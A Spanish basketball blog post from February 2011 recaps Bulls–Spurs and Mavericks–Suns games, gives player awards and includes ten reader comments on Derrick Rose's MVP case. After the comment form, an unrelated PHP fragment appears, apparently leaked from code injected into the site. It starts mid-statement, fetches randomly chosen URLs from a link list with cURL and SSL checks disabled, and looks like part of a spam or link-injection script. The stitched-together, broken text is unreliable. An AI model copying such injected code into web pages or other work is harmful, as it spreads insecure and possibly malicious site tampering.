La Crónica (17/02/2011)

18 de February de 2011 por txusma

Hoy acabaremos rápido y es que tan solo se jugaron 2 partidos en vísperas del All-Star, pero qué 2 partidos… En el primero de ellos Derrick Rose y los Bulls dieron un golpe sobre la mesa superando a los Spurs y presentando, creo que definitivamente, su candidatura al anillo (99-109). Los 42 puntos del ex de Memphis suponen un nuevo récord de su carrera y un paso más hacia el MVP, donde también es uno de los principales candidatos. A partir del All-Star, con la vuelta de Joakim Noah, podremos contemplar todo el potencia de los Bulls. ¿Suficiente para plantar cara a Celtics, Magic y Heat? Yo creo que sí.

El otro partido tampoco desmereció en absoluto. Dallas se impuso a domicilio a Phoenix en un partido vibrante resuelto en los últimos minutos (112-106). Dirk ejerció de líder y demostró estar perfectamente recuperado de la lesión que le mantuvo 9 partidos apartado de las canchas. Con su 13ª victoria en 14 partidos, los Mavs se confirman en la 2ª posición de la conferencia Oeste. Por su parte, los Suns se quedan fuera de Playoffs a pesar de haber ganado el 50% de los partidos. Igualito que en el Este…

La noticia del día es la elección, por parte de Greg Popovich, de Tim Duncan como pívot titular del Oeste en sustitución de Yao Ming. No seré yo quien proteste.

PREMIOS

MVP: Tanto Derrick Rose como Dirk Nowitzki han jugado a gran nivel pero nos quedamos con el de los Bulls. Como ya hemos dicho, sus 42 puntos suponen un récord en su carrera, que complementó con 5 rebotes y 8 asistencias.

Rookie: 4 triples de Gary Neal para un total de 16 puntos. Se lo debe estar pasando de fábula en San Antonio.

Sorpresa: Día de los buenos para Robin Lopez. Esperemos que el jugador de Phoenix no sea supersticioso porque acabó el partido con 13 puntos y 13 rebotes.

Decepción: Tiago Splitter no jugó anoche por lesión y ha de volver después del AllStar. Su temporada está siendo una auténtica lástima. Esperemos que de cara al año que viene la cosa mejore.

Esfuerzo en vano: El viejo rockero, Steve Nash, se volvió a quedar a las puertas de la victoria a pesar de una buena actuación. 15 puntos, 14 asistencias y 5 rebotes para el de los Suns.

Imágenes | AP Photos / Getty Images

Comenta

10 comentarios a esta entrada

  1. GreenPride dice:
    #1

    Impresionante el partido de Derrick Rose. Cada vez que le veo jugar me parece que ha mejorado. Indudablemente su tiro exterior es ahora toda una amenaza y eso unido a su rapidez, sus bandejas y sus “bombas” a lo Juan Carlos Navarro hacen de él uno de los mejores jugadores de la liga. Para mí claro candidato a MVP y a día de hoy para mí el actual MVP de la competición. Y con él todo su equipo de los Bulls. Yo estoy de acuerdo con la crónica y me parece que si Noah se recupera bien y está en forma para Playoffs que es de esperar que sí estos Bulls están para luchar por el anillo. Desde luego que para mí ya están por encima de los Magic y aún un pequeño paso por detrás de Celtics y Heat en el Este aunque muy igualados (para mí sólo les falla un poco su experiencia en Playoffs respecto a estos 2 equipos). Después del All-Star, el jueves que viene un interesantísimo Heat@Bulls con el segundo puesto de la conferencia Este en juego.
    Los Spurs no hicieron mal partido pero el huracán Rose se los llevó por delante. Nada preocupante para los hombres de negro que siguen camino del mejor record. Por cierto ayer pusieron estadísticas de los equipos top 5 (faltaban los Mavs en la estadística) unos contra otros en lo que puede dar una idea de cómo están las cosas más o menos cuando apriete el sol en Playoffs:
    Celtics 7-2
    Spurs 5-2
    Bulls 4-4
    Lakers 2-5
    Miami 1-6

      Citar

  2. HisRoyalAirness dice:
    #2

    Admiro a Tim como el que más pero si este año, en mi opinión, ya no merecía ser All-Star (si está él también debería estar Nash) creo que lo de ser titular es un amiguismo asqueroso por parte de su entrenador. No digo que tenga que ser Pau, digo que esperaba más elegancia y no poner a TÚ jugador a jugar en Los Ángeles.

    Y Derrick Rose cada día es más candidato a MVP. Si la liga terminase hoy se lo daría sin dudarlo un segundo.

      Citar

  3. Busky23 dice:
    #3

    Que talento este Rose,que quiebros,que driblings,que penetraciones…me encanta este tío,claro MVP a dia de hoy,JUGÓN!
    Sobre Dallas destacar lo importante que es Nowitzki en este equipo,fundamental,la segunda plaza del Oeste va estar interesante.

    A ver que tal este All-Star,Harden sustituye hoy en el Rookie-Challenge a Tyreke Evans.
    Espero que Griffin se luzca y Ibaka le ponga las cosas difíciles,el concurso de triples pinta muy bien,apuesto por Allen aunque ojito con Gibson que la puede liar parda.
    Del partido del domingo no espero gran cosa,aunque lo veré,no se deben romper las tradiciones,Durant MVP 😉

      Citar

  4. -=TheKing=- dice:
    #4

    Con Dirk a este nivel los Suns no pueden hacer nada.

      Citar

  5. Abel147 dice:
    #5

    Tremenda actuación de Rose anoche, si señor. Me encanta este jugador, está creciendo mucho y estoy de acuerdo con vosotros, le daría el MVP de la temporada a día de hoy sin dudarlo. Pero, viendo su espectacular y atlético juego, no creéis que depende mucho de su físico? A día de hoy es imparable, pero conforme pasen los años tendrá que cambiar su juego de alguna manera, y además no es que sea un gran asistente.. Sé que es cavilar demasiado, pero es que le veo a un nivel físico exagerado.

    Por cierto, un saludo, que soy nuevo y es mi primera aportación al blog.

      Citar

  6. TheDeerHunter dice:
    #6

    Pues bienvenido Abel,
    Yo creo que Rose depende del físico, como todos… pero también le observo una progresión técnica que no tienen otros. Y un carácter innato, que no se pierde.
    Para mí MVP, sin ninguna duda.

      Citar

  7. M dice:
    #7

    ¡El MVP debe ser para Bryant! ¿Qué pasa, no veís los resumenes de la NBA? xDD

      Citar

  8. Scriers dice:
    #8

    Me uno al carro. Rose Mvp. y eso que no me gusta nada.

      Citar

  9. Uno cualquiera dice:
    #9

    Yo con tal de que no se lo vuelvan a dar a LeBron como si se lo dan a Samardo…

      Citar

  10. Denise dice:
    #10

    El concursillo de mates lo ganará Blake Griffin por decreto, y el de triples (lo unico minimamente interesante en todo el fin de semana) apuesto por Daniel Gibson

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>